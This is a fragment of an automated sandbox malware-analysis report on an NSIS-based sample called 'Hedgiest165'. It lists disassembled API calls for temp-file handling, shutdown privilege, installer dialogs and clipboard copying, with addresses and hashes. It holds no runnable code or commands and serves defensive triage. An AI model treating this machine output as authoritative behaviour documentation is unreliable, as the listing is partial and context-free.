                                                                        • lstrcatW.KERNEL32(00437800,\Temp,?,00000007,00000009,0000000B), ref: 004036EF
                                                                        • GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000007,00000009,0000000B), ref: 00403703
                                                                        • lstrcatW.KERNEL32(00437800,Low,?,00000007,00000009,0000000B), ref: 0040370B
                                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000007,00000009,0000000B), ref: 0040371C
                                                                        • SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000007,00000009,0000000B), ref: 00403724
                                                                        • DeleteFileW.KERNEL32(00437000,?,00000007,00000009,0000000B), ref: 00403738
                                                                          • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                        • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403803
                                                                        • ExitProcess.KERNEL32 ref: 00403824
                                                                        • lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 00403837
                                                                        • lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 00403846
                                                                        • lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 00403851
                                                                        • lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000007,?,00000007,00000009,0000000B), ref: 0040385D
                                                                        • SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000007,00000009,0000000B), ref: 00403879
                                                                        • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 004038D3
                                                                        • CopyFileW.KERNEL32(00438800,00420EC8,00000001,?,00000007,00000009,0000000B), ref: 004038E7
                                                                        • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000,?,00000007,00000009,0000000B), ref: 00403914
                                                                        • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403943
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040394A
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395F
                                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403982
                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004039A7
                                                                        • ExitProcess.KERNEL32 ref: 004039CA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                        • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                        • API String ID: 3441113951-3195845224
                                                                        • Opcode ID: e1b85bccdae587764f7fe1a1fb27296d24799a3053249338d16195b886ff37fe
                                                                        • Instruction ID: 80ab2d28ddbf02fe5cd82fe477cea5b095f50d567d4594062ccc97c7db5cb5a9
                                                                        • Opcode Fuzzy Hash: e1b85bccdae587764f7fe1a1fb27296d24799a3053249338d16195b886ff37fe
                                                                        • Instruction Fuzzy Hash: 32D107B0204310ABD7207F659E45A3B3AACEB4470AF11447FF481F62E1DBBD8956876E
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(?,?,75923420,00437800,00000000), ref: 00405B16
                                                                        • lstrcatW.KERNEL32(00425710,\*.*,00425710,?,?,75923420,00437800,00000000), ref: 00405B5E
                                                                        • lstrcatW.KERNEL32(?,0040A014,?,00425710,?,?,75923420,00437800,00000000), ref: 00405B81
                                                                        • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,75923420,00437800,00000000), ref: 00405B87
                                                                        • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,75923420,00437800,00000000), ref: 00405B97
                                                                        • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C37
                                                                        • FindClose.KERNEL32(00000000), ref: 00405C46
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                        • String ID: \*.*
                                                                        • API String ID: 2035342205-1173974218
                                                                        • Opcode ID: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
                                                                        • Instruction ID: 6d977be599016ad98dbda8fdbba8a7eaa4df1add9cdfb0a4bac278b573c77b22
                                                                        • Opcode Fuzzy Hash: 4a9a22c29218aab3c5ab50421185d04963702c080e01836bd37a1bf3e254f337
                                                                        • Instruction Fuzzy Hash: 1A41D530904A18AAEB216B65DC8AABF7678EF41718F10413FF801B11D1D77C5AC1DEAE
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                        • Instruction ID: 1b8bdd5ad4fc83de7ba6cec7d94a6212227b50c179fbf06187fd9840cc1d6bdc
                                                                        • Opcode Fuzzy Hash: 8e4b5ecac14f05fa2fd75170ea9dc483b74f0c48ec088bd1d9ad5172d207252c
                                                                        • Instruction Fuzzy Hash: 44F18770D04229CBDF18CFA8C8946ADBBB1FF45305F25816ED852BB281D7386A86DF45
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(75923420,00426758,00425F10,00405E01,00425F10,00425F10,00000000,00425F10,00425F10,75923420,?,00437800,00405B0D,?,75923420,00437800), ref: 00406744
                                                                        • FindClose.KERNEL32(00000000), ref: 00406750
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID: XgB
                                                                        • API String ID: 2295610775-796949446
                                                                        • Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                        • Instruction ID: 870aa7139b81afaf1942c507467f7acad87ed8de72819481db2edd1f78cd0942
                                                                        • Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
                                                                        • Instruction Fuzzy Hash: 09D012316042305FC35127387E4C84B7B9A9F563393228B76B5AAF21E0C7748C3287AC
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32(?,?,221C4A8A,?,221D2238,0000000C,221C4BBD,00000000,00000000,00000001,221C2082,221D2108,0000000C,221C1F3A,?), ref: 221C4AD5
                                                                        • TerminateProcess.KERNEL32(00000000,?,221C4A8A,?,221D2238,0000000C,221C4BBD,00000000,00000000,00000001,221C2082,221D2108,0000000C,221C1F3A,?), ref: 221C4ADC
                                                                        • ExitProcess.KERNEL32 ref: 221C4AEE
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentExitTerminate
                                                                        • String ID:
                                                                        • API String ID: 1703294689-0
                                                                        • Opcode ID: e111fe184733c25e842ef0cfd87cf9455c3c647572e83b49b6a4fb7471f93bb7
                                                                        • Instruction ID: 1114f6c85260be08799ea9b8c7aed63d8a5a0694776edbe7b129da3629b7fb91
                                                                        • Opcode Fuzzy Hash: e111fe184733c25e842ef0cfd87cf9455c3c647572e83b49b6a4fb7471f93bb7
                                                                        • Instruction Fuzzy Hash: 3EE04F3D184304AFCF116F18CD09E8A3F69FF50751B104414FD0547021CB39DA63DA46
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3298999836.00000000221C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 221C0000, based on PE: true
                                                                        • Associated: 00000006.00000002.3298980061.00000000221C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3298999836.00000000221D6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_221c0000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: a7214134d387942363695f5a596a1fe51366a2b39cb63cd3b0404b1b7dd68f08
                                                                        • Instruction ID: d39b5e2f4ba27bae76b54f27c402a98c78ba9a60bf7433892a2aa725ddb51247
                                                                        • Opcode Fuzzy Hash: a7214134d387942363695f5a596a1fe51366a2b39cb63cd3b0404b1b7dd68f08
                                                                        • Instruction Fuzzy Hash: AFA01138382202CF83008F38820AA0E3AECAA002A030008A8AC08C8008EB2880208A0A

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 275 405582-40559d 276 4055a3-40566a GetDlgItem * 3 call 404366 call 404cbf GetClientRect GetSystemMetrics SendMessageW * 2 275->276 277 40572c-405733 275->277 295 405688-40568b 276->295 296 40566c-405686 SendMessageW * 2 276->296 279 405735-405757 GetDlgItem CreateThread CloseHandle 277->279 280 40575d-40576a 277->280 279->280 281 405788-405792 280->281 282 40576c-405772 280->282 286 405794-40579a 281->286 287 4057e8-4057ec 281->287 284 405774-405783 ShowWindow * 2 call 404366 282->284 285 4057ad-4057b6 call 404398 282->285 284->281 299 4057bb-4057bf 285->299 292 4057c2-4057d2 ShowWindow 286->292 293 40579c-4057a8 call 40430a 286->293 287->285 290 4057ee-4057f4 287->290 290->285 297 4057f6-405809 SendMessageW 290->297 300 4057e2-4057e3 call 40430a 292->300 301 4057d4-4057dd call 405443 292->301 293->285 302 40569b-4056b2 call 404331 295->302 303 40568d-405699 SendMessageW 295->303 296->295 304 40590b-40590d 297->304 305 40580f-40583a CreatePopupMenu call 406418 AppendMenuW 297->305 300->287 301->300 314 4056b4-4056c8 ShowWindow 302->314 315 4056e8-405709 GetDlgItem SendMessageW 302->315 303->302 304->299 312 40583c-40584c GetWindowRect 305->312 313 40584f-405864 TrackPopupMenu 305->313 312->313 313->304 316 40586a-405881 313->316 317 4056d7 314->317 318 4056ca-4056d5 ShowWindow 314->318 315->304 319 40570f-405727 SendMessageW * 2 315->319 320 405886-4058a1 SendMessageW 316->320 321 4056dd-4056e3 call 404366 317->321 318->321 319->304 320->320 322 4058a3-4058c6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 320->322 321->315 324 4058c8-4058ef SendMessageW 322->324 324->324 325 4058f1-405905 GlobalUnlock SetClipboardData CloseClipboard 324->325 325->304
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 004055E0
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004055EF
                                                                        • GetClientRect.USER32(?,?), ref: 0040562C
                                                                        • GetSystemMetrics.USER32(00000002), ref: 00405633
                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405654
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405665
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405678
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405686
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405699
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056BB
                                                                        • ShowWindow.USER32(?,00000008), ref: 004056CF
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004056F0
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405700
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405719
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405725
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004055FE
                                                                          • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405742
                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005516,00000000), ref: 00405750
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405757
                                                                        • ShowWindow.USER32(00000000), ref: 0040577B
                                                                        • ShowWindow.USER32(?,00000008), ref: 00405780
                                                                        • ShowWindow.USER32(00000008), ref: 004057CA
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057FE
                                                                        • CreatePopupMenu.USER32 ref: 0040580F
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405823
                                                                        • GetWindowRect.USER32(?,?), ref: 00405843
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040585C
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405894
                                                                        • OpenClipboard.USER32(00000000), ref: 004058A4
                                                                        • EmptyClipboard.USER32 ref: 004058AA
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058B6
                                                                        • GlobalLock.KERNEL32(00000000), ref: 004058C0
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058D4
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004058F4
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004058FF
                                                                        • CloseClipboard.USER32 ref: 00405905
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                        • String ID: {
                                                                        • API String ID: 590372296-366298937
                                                                        • Opcode ID: f65aa7f937581e07d3c42bb09a9e50e0b84de44c594279e18219e3c4cf2473b2
                                                                        • Instruction ID: 548bfd7703c7e8b67cc6bd423be8dd859740628245fa72e8840ee51ebf386eb0
                                                                        • Opcode Fuzzy Hash: f65aa7f937581e07d3c42bb09a9e50e0b84de44c594279e18219e3c4cf2473b2
                                                                        • Instruction Fuzzy Hash: D0B159B0900609FFDB11AF61DD89AAE7B79FB44354F00803AFA45B61A0C7754E51DF68

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 326 404d9e-404dec GetDlgItem * 2 327 404df2-404e8d GlobalAlloc LoadImageW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 326->327 328 40501f-405026 326->328 329 404e9c-404ea5 DeleteObject 327->329 330 404e8f-404e9a SendMessageW 327->330 331 405028-405038 328->331 332 40503a 328->332 334 404ea7-404eaf 329->334 330->329 333 40503d-405046 331->333 332->333 335 405051-405057 333->335 336 405048-40504b 333->336 337 404eb1-404eb4 334->337 338 404ed8-404edc 334->338 343 405066-40506d 335->343 344 405059-405060 335->344 336->335 340 405135-40513c 336->340 341 404eb6 337->341 342 404eb9-404ed6 call 406418 SendMessageW * 2 337->342 338->334 339 404ede-404f0e call 404331 * 2 338->339 382 404f14-404f1a 339->382 383 404fde-404ff1 GetWindowLongW SetWindowLongW 339->383 348 4051ad-4051b4 340->348 349 40513e-405144 340->349 341->342 342->338 345 4050e5-4050e8 343->345 346 40506f-405072 343->346 344->340 344->343 345->340 359 4050ea-4050f4 345->359 354 405074-40507b 346->354 355 40507d-405093 call 404cec 346->355 351 4051c2-4051c9 348->351 352 4051b6-4051c0 SendMessageW 348->352 357 4053a2-4053b4 call 404398 349->357 358 40514a-405154 349->358 363 4051cb-4051d2 351->363 364 4051fd-405204 351->364 352->351 354->345 354->355 355->345 381 405095-4050a3 355->381 358->357 367 40515a-405169 SendMessageW 358->367 360 405104-40510e 359->360 361 4050f6-405102 SendMessageW 359->361 360->340 368 405110-405117 360->368 361->360 370 4051d4-4051d5 ImageList_Destroy 363->370 371 4051db-4051e2 363->371 374 405364-40536b 364->374 375 40520a-405216 call 4011ef 364->375 367->357 376 40516f-405180 SendMessageW 367->376 377 405128-405132 368->377 378 405119-405126 368->378 370->371 379 4051e4-4051e5 GlobalFree 371->379 380 4051eb-4051f7 371->380 374->357 387 40536d-405374 374->387 400 405226-405229 375->400 401 405218-40521b 375->401 385 405182-405188 376->385 386 40518a-40518c 376->386 377->340 378->340 379->380 380->364 381->345 389 4050a5-4050a7 381->389 390 404f1d-404f23 382->390 388 404ff7-404ffa 383->388 385->386 392 40518d-4051a6 call 401299 SendMessageW 385->392 386->392 387->357 393 405376-4053a0 ShowWindow GetDlgItem ShowWindow 387->393 394 405014-40501c call 404366 388->394 395 404ffc-40500f ShowWindow call 404366 388->395 396 4050a9-4050b0 389->396 397 4050ba 389->397 398 404fc0-404fd3 390->398 399 404f29-404f54 390->399 392->348 393->357 394->328 395->357 407 4050b2-4050b4 396->407 408 4050b6-4050b8 396->408 411 4050bd-4050e2 call 40117d 397->411 398->390 415 404fd9-404fdc 398->415 409 404f90-404f92 399->409 410 404f56-404f8e SendMessageW 399->410 403 40526a-40528e call 4011ef 400->403 404 40522b-405244 call 4012e2 call 401299 400->404 412 40521d 401->412 413 40521e-405221 call 404d6c 401->413 428 405330-405338 403->428 429 405294 403->429 434 405254-405263 SendMessageW 404->434 435 405246-40524c 404->435 407->411 408->411 420 404f94-404fa6 SendMessageW 409->420 421 404fa8-404fbd SendMessageW 409->421 410->398 411->345 412->413 413->400 415->383 415->388 420->398 421->398 431 405346-40534e 428->431 432 40533a-405340 InvalidateRect 428->432 433 405297-4052a2 429->433 431->374 438 405350-40535f call 404cbf call 404ca7 431->438 432->431 436 4052a4-4052b3 433->436 437 405318-40532a 433->437 434->403 439 40524e 435->439 440 40524f-405252 435->440 442 4052b5-4052c2 436->442 443 4052c6-4052c9 436->443 437->428 437->433 438->374 439->440 440->434 440->435 442->443 444 4052d0-4052d9 443->444 445 4052cb-4052ce 443->445 447 4052de-405316 SendMessageW * 2 444->447 448 4052db 444->448 445->447 447->437 448->447
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404DB5
                                                                        • GetDlgItem.USER32(?,00000408), ref: 00404DC2
                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E0E
                                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404E25
                                                                        • SetWindowLongW.USER32(?,000000FC,004053B7), ref: 00404E3F
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E53
                                                                        • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404E67
                                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404E7C
                                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404E88
                                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E9A
                                                                        • DeleteObject.GDI32(00000110), ref: 00404E9F
                                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404ECA
                                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ED6
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F71
                                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404FA1
                                                                          • Part of subcall function 00404366: SendMessageW.USER32(00000028,?,00000001,00404191), ref: 00404374
                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FB5
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404FE3
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404FF1
                                                                        • ShowWindow.USER32(?,00000005), ref: 00405001
                                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405102
                                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405164
                                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405179
                                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040519D
                                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051C0
                                                                        • ImageList_Destroy.COMCTL32(?), ref: 004051D5
                                                                        • GlobalFree.KERNEL32(?), ref: 004051E5
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040525E
                                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405307
                                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405316
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405340
                                                                        • ShowWindow.USER32(?,00000000), ref: 0040538E
                                                                        • GetDlgItem.USER32(?,000003FE), ref: 00405399
                                                                        • ShowWindow.USER32(00000000), ref: 004053A0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.3284453807.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.3284432101.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284477212.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284502518.000000000040A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000006.00000002.3284523897.000000000044A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_Hedgiest165.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                        • String ID: $M$N
                                                                        • API String ID: 2564846305-813528018
                                                                        • Opcode ID: e7f2cc311ed861dc7a8dc689f905fe7daa5aa35bbb59c65f8d68f84c4dda8460
                                                                        • Instruction ID: f13cb60032faeb06b1ff68bd0c1dc2f430bb97b794b1e627908efdb4cc4bd96d
                                                                        • Opcode Fuzzy Hash: e7f2cc311ed861dc7a8dc689f905fe7daa5aa35bbb59c65f8d68f84c4dda8460
                                                                        • Instruction Fuzzy Hash: 04127DB0900609EFDF209F95CD45AAE7BB5FB84314F10817AFA10BA2E1D7798951CF58

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 450 403e58-403e6a 451 403e70-403e76 450->451 452 403fab-403fba 450->452 451->452 453 403e7c-403e85 451->453 454 404009-40401e 452->454 455 403fbc-404004 GetDlgItem * 2 call 404331 SetClassLongW call 40140b 452->455 458 403e87-403e94 SetWindowPos 453->458 459 403e9a-403e9d 453->459 456 404020-404023 454->456 457 40405e-404063 call 40437d 454->457 455->454 461 404025-404030 call 401389 456->461 462 404056-404058 456->462 469 404068-404083 457->469 458->459 464 403eb7-403ebd 459->464 465 403e9f-403eb1 ShowWindow 459->465 461->462 483 404032-404051 SendMessageW 461->483 462->457 468 4042fe 462->468 470 403ed9-403edc 464->470 471 403ebf-403ed4 DestroyWindow 464->471 465->464 476 404300-404307 468->476 474 404085-404087 call 40140b 469->474 475 40408c-404092 469->475 479 403ede-403eea SetWindowLongW 470->479 480 403eef-403ef5 470->480 477 4042db-4042e1 471->477 474->475 486 404098-4040a3 475->486 487 4042bc-4042d5 DestroyWindow EndDialog 475->487 477->468 485 4042e3-4042e9 477->485 479->476 481 403f98-403fa6 call 404398 480->481 482 403efb-403f0c GetDlgItem 480->482 481->476 488 403f2b-403f2e 482->488 489 403f0e-403f25 SendMessageW IsWindowEnabled 482->489 483->476 485->468 491 4042eb-4042f4 ShowWindow 485->491 486->487 492 4040a9-4040f6 call 406418 call 404331 * 3 GetDlgItem 486->492 487->477 493 403f30-403f31 488->493 494 403f33-403f36 488->494 489->468 489->488 491->468 520 404100-40413c ShowWindow EnableWindow call 404353 EnableWindow 492->520 521 4040f8-4040fd 492->521 497 403f61-403f66 call 40430a 493->497 498 403f44-403f49 494->498 499 403f38-403f3e 494->499 497->481 503 403f7f-403f92 SendMessageW 498->503 504 403f4b-403f51 498->504 502 403f40-403f42 499->502 499->503 502->497 503->481 508 403f53-403f59 call 40140b 504->508 509 403f68-403f71 call 40140b 504->509 518 403f5f 508->518 509->481 517 403f73-403f7d 509->517 517->518 518->497 524 404141 520->524 525 40413e-40413f 520->525 521->520 526 404143-404171 GetSystemMenu EnableMenuItem SendMessageW 524->526 525->526 527 404173-404184 SendMessageW 526->527 528 404186 526->528 529 40418c-4041cb call 404366 call 403e39 call 4063db lstrlenW call 406418 SetWindowTextW call 401389 527->529 528->529 529->469 540 4041d1-4041d3 529->540 540->469 541 4041d9-4041dd 540->541 542 4041fc-404210 DestroyWindow 541->542 543 4041df-4041e5 541->543 542->477 544 404216-404243 CreateDialogParamW 542->544 543->468 545 4041eb-4041f1 543->545 544->477 546 404249-4042a0 call 404331 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 544->546 545->469 547 4041f7 545->547 546->468 552 4042a2-4042ba ShowWindow call 40437d 546->552 547->468 552->477
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E94
                                                                        • ShowWindow.USER32(?), ref: 00403EB1
                                                                        • DestroyWindow.USER32 ref: 00403EC5
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EE1
                                                                        • GetDlgItem.USER32(?,?), ref: 00403F02
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F16
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403F1D
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403FCB
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403FD5
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403FEF
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404040
                                                                        • GetDlgItem.USER32(?,00000003), ref: 004040E6
                                                                        • ShowWindow.USER32(00000000,?), ref: 00404107
                                                                        • EnableWindow.USER32(?,?), ref: 00404119
